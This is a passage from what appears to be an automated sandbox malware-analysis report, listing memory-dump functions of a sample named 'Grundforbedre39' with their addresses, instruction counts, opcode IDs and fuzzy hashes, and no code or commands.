                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5a1adade6c8e72d917e8a2c643bb7d1b2c760092fbce8e4a879e90de28eaee39
                                                                                      • Instruction ID: 70b8a3596a2435fd774ee41e49f7e842f8868dceca1a83b6c31be040bbed29d0
                                                                                      • Opcode Fuzzy Hash: 5a1adade6c8e72d917e8a2c643bb7d1b2c760092fbce8e4a879e90de28eaee39
                                                                                      • Instruction Fuzzy Hash: 9FF024767483405BF308C6099C21F27B2EBE7C2751FA0806BEA058B2D1EA72FC41CE94
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 355E32C9 Relevance: .0, Instructions: 38COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6204972ff3b380f720e05b2ecc519c88e41dbe2758d314eba0478bbef22976ee
                                                                                      • Instruction ID: b6edf3e90cfb65fdaa40aa065524220f9a63fbdda9216e9544a1ec6bf9d26935
                                                                                      • Opcode Fuzzy Hash: 6204972ff3b380f720e05b2ecc519c88e41dbe2758d314eba0478bbef22976ee
                                                                                      • Instruction Fuzzy Hash: ADF0EC72A40644BEE7119B68CC41FDAB7BCEB44714F504566A956D7180EAB0BA44CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3559C51D Relevance: .0, Instructions: 36COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ac7ad0b141c88d69fbd5e58a5807a7502e2b67115f25f80c7eb90810f90e2fcd
                                                                                      • Instruction ID: 7d70adb297ba27e163d36ee8c606951dd62c7428e29fa24bce8dd1cf8d3fd347
                                                                                      • Opcode Fuzzy Hash: ac7ad0b141c88d69fbd5e58a5807a7502e2b67115f25f80c7eb90810f90e2fcd
                                                                                      • Instruction Fuzzy Hash: C6F0AF702093449FC718DF28C546A1AB7E4FF88B14F804A5EB8A8DB390EA34E900C796
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 35540774 Relevance: .0, Instructions: 35COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 07c5d816c6ee379389dd050073cc132e24b80b6886f799c70d6e9732ef0d589d
                                                                                      • Instruction ID: 5fe3de5397ae38c684a8cf38b5708b88769116696a00b6b08001f7a824768ec4
                                                                                      • Opcode Fuzzy Hash: 07c5d816c6ee379389dd050073cc132e24b80b6886f799c70d6e9732ef0d589d
                                                                                      • Instruction Fuzzy Hash: 97F09AB2614204AEE314CF21CC49B96B3F9EF98760F6484689905DB2B0FAB1EE00CA55
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 355E5149 Relevance: .0, Instructions: 35COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: cd41c82d65eaa53f2a975e62a90989b6dd233a3dad591401aff84c1695430ff0
                                                                                      • Instruction ID: 2a17da57c10e0030a3d755fd4f5a0486130297be8165b6b719897f7165a8becb
                                                                                      • Opcode Fuzzy Hash: cd41c82d65eaa53f2a975e62a90989b6dd233a3dad591401aff84c1695430ff0
                                                                                      • Instruction Fuzzy Hash: 69F06274A00248EFDB04DFB8D945A9EB7F4FF48304F50845AB945EB380EA74EA00CB54
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3551471B Relevance: .0, Instructions: 33COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a50abc0add88f4cc1a30e546aab443d315f4e9af3a9cea92f6d1a8deb0a8656a
                                                                                      • Instruction ID: fe6e92f6908691bd3b1a8d302fffca24707ecb598c542956e036ba4fed71eadd
                                                                                      • Opcode Fuzzy Hash: a50abc0add88f4cc1a30e546aab443d315f4e9af3a9cea92f6d1a8deb0a8656a
                                                                                      • Instruction Fuzzy Hash: 6FF0FAB9A053D0CEFF11C3248004B427FE9AB432B3F48AC66CC298F951C360FA82C290
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 355CF247 Relevance: .0, Instructions: 33COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0a12dbab9318c5ffeb9a7cd0bcf33684faa076b2346fb2b7d18c0b52690ca325
                                                                                      • Instruction ID: 5f9a316bbe3208699876aa402a5f83e4f43c3ad7f74811998221bf1f3ec26810
                                                                                      • Opcode Fuzzy Hash: 0a12dbab9318c5ffeb9a7cd0bcf33684faa076b2346fb2b7d18c0b52690ca325
                                                                                      • Instruction Fuzzy Hash: 99F090B5A10348EFDB08DFE9D805E9EB7F4AF48304F4044A9B506EB381EA74E900CB94
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3554C50D Relevance: .0, Instructions: 31COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a0b0274bd06a1a835ad83733cd3d2fa37fab880e0b783acfe383d44be13274d4
                                                                                      • Instruction ID: fef6b5f99d04b61f54cc500bc3d7377d4c7fb66c5e8cf0b9656658cff56369dc
                                                                                      • Opcode Fuzzy Hash: a0b0274bd06a1a835ad83733cd3d2fa37fab880e0b783acfe383d44be13274d4
                                                                                      • Instruction Fuzzy Hash: 43F0E2FA5157D0DFE311D758D04CBCA77E4ABC56A4F818565D406C7561C760F880C2C4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 35552539 Relevance: .0, Instructions: 31COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 854bbfb820fb8e437c19399cecc5432b6a77370230882946a21409e0fbaa6217
                                                                                      • Instruction ID: 86191567b85edbb24160f1642ced64125db899f8928724985d34f421e81872b8
                                                                                      • Opcode Fuzzy Hash: 854bbfb820fb8e437c19399cecc5432b6a77370230882946a21409e0fbaa6217
                                                                                      • Instruction Fuzzy Hash: F2E0D8723405402BD7118E59CCD4F5777AEEFC6720F94087AB9055F292C9E2ED0983A0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 35529319 Relevance: .0, Instructions: 31COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 450e3e68742e94ba50cb78341822e58078eee6944759b98c9bfd496cc3decfc1
                                                                                      • Instruction ID: e7069d7479603c36fe365b1e89a2ac25fd220dc9b52c0a4eb0312352d7699570
                                                                                      • Opcode Fuzzy Hash: 450e3e68742e94ba50cb78341822e58078eee6944759b98c9bfd496cc3decfc1
                                                                                      • Instruction Fuzzy Hash: A7F0E2349443409EEB15DBA8C840F5ABBB0BF24B64F810965D902EB2E0DBA0BD41CBD0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 355CF717 Relevance: .0, Instructions: 30COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c5f872b4029b71458acf0285e6df5bb01c3c5adaa0756e181cdf06810c2d4611
                                                                                      • Instruction ID: 5e7a35e60728aec618e8add55fc21f8e008419140f8ed6dc30c3cdbfb48784be
                                                                                      • Opcode Fuzzy Hash: c5f872b4029b71458acf0285e6df5bb01c3c5adaa0756e181cdf06810c2d4611
                                                                                      • Instruction Fuzzy Hash: B1F08274A04248EFDB04CBA9D546A9E77F8AF48714F504499F602EB2C0E974E9008758
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 355CF7CF Relevance: .0, Instructions: 30COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9bf120372b1e4a180ce081309eb2a22ed8d35fcb3802b74c187853b84a64e59e
                                                                                      • Instruction ID: 373c5f0b9200f1ee0fe68a14b89bc26b5a6e2c7208c26e334bf039bd5c9afeb5
                                                                                      • Opcode Fuzzy Hash: 9bf120372b1e4a180ce081309eb2a22ed8d35fcb3802b74c187853b84a64e59e
                                                                                      • Instruction Fuzzy Hash: AEF08270B00248EFDB04CBA9D546A9E77B8AF48714F900499F502FB2C4E974E940C754
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 35547128 Relevance: .0, Instructions: 30COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f7742038e17dde7804d602c1574a758e4afb63537212453d9801c3933b7af90b
                                                                                      • Instruction ID: 1ba4ac8ebb226b95ab90eb89551112ed55aed0edc7c6166e791b3c7621156eb8
                                                                                      • Opcode Fuzzy Hash: f7742038e17dde7804d602c1574a758e4afb63537212453d9801c3933b7af90b
                                                                                      • Instruction Fuzzy Hash: 4CF0B876A15690DFEB12C325C044F0273E9BB80BBAF0A8460D81A87A02CB20F8C0C290
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 355E505B Relevance: .0, Instructions: 30COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 70ef16296714b6d2cf63d89f5cc64811a3beeae62e21e15fddd47e9ec923ebf9
                                                                                      • Instruction ID: 8d4bc6d5f4391847458bf1d997581ec7f91b0e076a2b23816841189d3654ed10
                                                                                      • Opcode Fuzzy Hash: 70ef16296714b6d2cf63d89f5cc64811a3beeae62e21e15fddd47e9ec923ebf9
                                                                                      • Instruction Fuzzy Hash: A8F08270A00248EFDB04DBB9D556E9E77B8AF48714F504899B501EB2C0EA74F9008754
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3554174A Relevance: .0, Instructions: 29COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 44d726ecbe170671f3bb51826f242c83d37471334565efb5210c5d5d66271c5b
                                                                                      • Instruction ID: d4b20937554003a9c808a445960811abf06a6eebc0c71960ba1c037b72d0e0dc
                                                                                      • Opcode Fuzzy Hash: 44d726ecbe170671f3bb51826f242c83d37471334565efb5210c5d5d66271c5b
                                                                                      • Instruction Fuzzy Hash: E9E092B27018216BE3119E19EC00F6773ADEFE4650F590436F505D7254DA28ED02C7E0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 355454E0 Relevance: .0, Instructions: 28COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 07c37ed023dd9b40fe5caa062012deae31cae245a220534e2279f616e0e49e01
                                                                                      • Instruction ID: c936eb2749dd25ec52d68f83470f40c39b947b9c14708c317d4c3a8137af458a
                                                                                      • Opcode Fuzzy Hash: 07c37ed023dd9b40fe5caa062012deae31cae245a220534e2279f616e0e49e01
                                                                                      • Instruction Fuzzy Hash: 65E0ED73244711ABD3214E0ACC00F06BB68FB90BB1F01862AF518579A08FA0F801CAE0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 35510630 Relevance: .0, Instructions: 28COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7fb8b229e0179ed1d94183841a0f137a63d66d46d99527f7ccba905b47740c18
                                                                                      • Instruction ID: 1d7b37cfea9cc467d47087f9fc28035457ec2a6f218ab8da6576905744cc7037
                                                                                      • Opcode Fuzzy Hash: 7fb8b229e0179ed1d94183841a0f137a63d66d46d99527f7ccba905b47740c18
                                                                                      • Instruction Fuzzy Hash: 2DF0E57A2053449FEB05CF13C040A857BE4BB953A4F010494EC058B351DB71F981C781
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 355E3336 Relevance: .0, Instructions: 27COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c0008614389e4c6b7c8f3a5444dc37d698eba2a91f3b45f08bbf5d080c4fc888
                                                                                      • Instruction ID: a6b5fc8a736d87cbaf7dcdee64928ad4d145bc64a1378409995512e750ab74e4
                                                                                      • Opcode Fuzzy Hash: c0008614389e4c6b7c8f3a5444dc37d698eba2a91f3b45f08bbf5d080c4fc888
                                                                                      • Instruction Fuzzy Hash: 33E065B2210200BFE725CB48CD01FE673ACEB54720F910658B126920E0DAB0FE40CB60
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 35512500 Relevance: .0, Instructions: 23COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8da28c4c2344bc585a1c8e7fe869499fe39177b49d4fad81684c5f0e6d691a28
                                                                                      • Instruction ID: ffb4ab21c1881ee37d20c285a9911c33a29cce14011c012af3412ddc5dd8178d
                                                                                      • Opcode Fuzzy Hash: 8da28c4c2344bc585a1c8e7fe869499fe39177b49d4fad81684c5f0e6d691a28
                                                                                      • Instruction Fuzzy Hash: D1E09232210544ABC721AB19DC11F9A7BEAEB90371F414515F116575A0CB70FE10C7C4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 355081EB Relevance: .0, Instructions: 21COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ac7c584822953886a024a6d7f531a89d3c4335e185ffb9ea20263c4af986c53d
                                                                                      • Instruction ID: 62ba080f85b25f160f835583d0b53a290ab13d4e800341b561f2c579bd95ad14
                                                                                      • Opcode Fuzzy Hash: ac7c584822953886a024a6d7f531a89d3c4335e185ffb9ea20263c4af986c53d
                                                                                      • Instruction Fuzzy Hash: 5FE08C32240610EEEB315E20DC00F4576B2BF80760F25086AE086078A08FF4B881DF88
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3550B502 Relevance: .0, Instructions: 17COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c583dce7c6f581c5b0a3768414c357600350311837f1921a9e10f15296612cb1
                                                                                      • Instruction ID: 2080c5ab453fdb3511df46ab0ed4a6e8c23dbbf3b03331593ffc13711bf6b984
                                                                                      • Opcode Fuzzy Hash: c583dce7c6f581c5b0a3768414c357600350311837f1921a9e10f15296612cb1
                                                                                      • Instruction Fuzzy Hash: 42D05E32251610AEC7321F10EE45F967AB5AF80B25F460968B101174F096A1FD84CA91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3558E588 Relevance: .0, Instructions: 16COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 52e1c536986b7be52acab18f0f65ce6b57b56a1f95f795bf6ae5db3b9db2cf4f
                                                                                      • Instruction ID: 28dd80abdb1c2ef2cfc5a3a89e9115d0b79950f40b67442996bceee140fa61d7
                                                                                      • Opcode Fuzzy Hash: 52e1c536986b7be52acab18f0f65ce6b57b56a1f95f795bf6ae5db3b9db2cf4f
                                                                                      • Instruction Fuzzy Hash: FAE0E27AB946849FDF12DF99CA40F5EBBF9BB85B00F550458A409AB6A0C724FE00CB40
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3554E4BC Relevance: .0, Instructions: 16COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5a3d40c4745f6345f33bf01183ce61f2c0162c83d53e40109a16f3db65756406
                                                                                      • Instruction ID: 41cc1a79172e08294f9df8e427e08492c28ef1f736191c3588f46fedea7cbcf8
                                                                                      • Opcode Fuzzy Hash: 5a3d40c4745f6345f33bf01183ce61f2c0162c83d53e40109a16f3db65756406
                                                                                      • Instruction Fuzzy Hash: C0D09272254650AFD7729A18BC00FC372E9AB98B65F160859B119C71A1C765AC818684
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3550A093 Relevance: .0, Instructions: 15COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
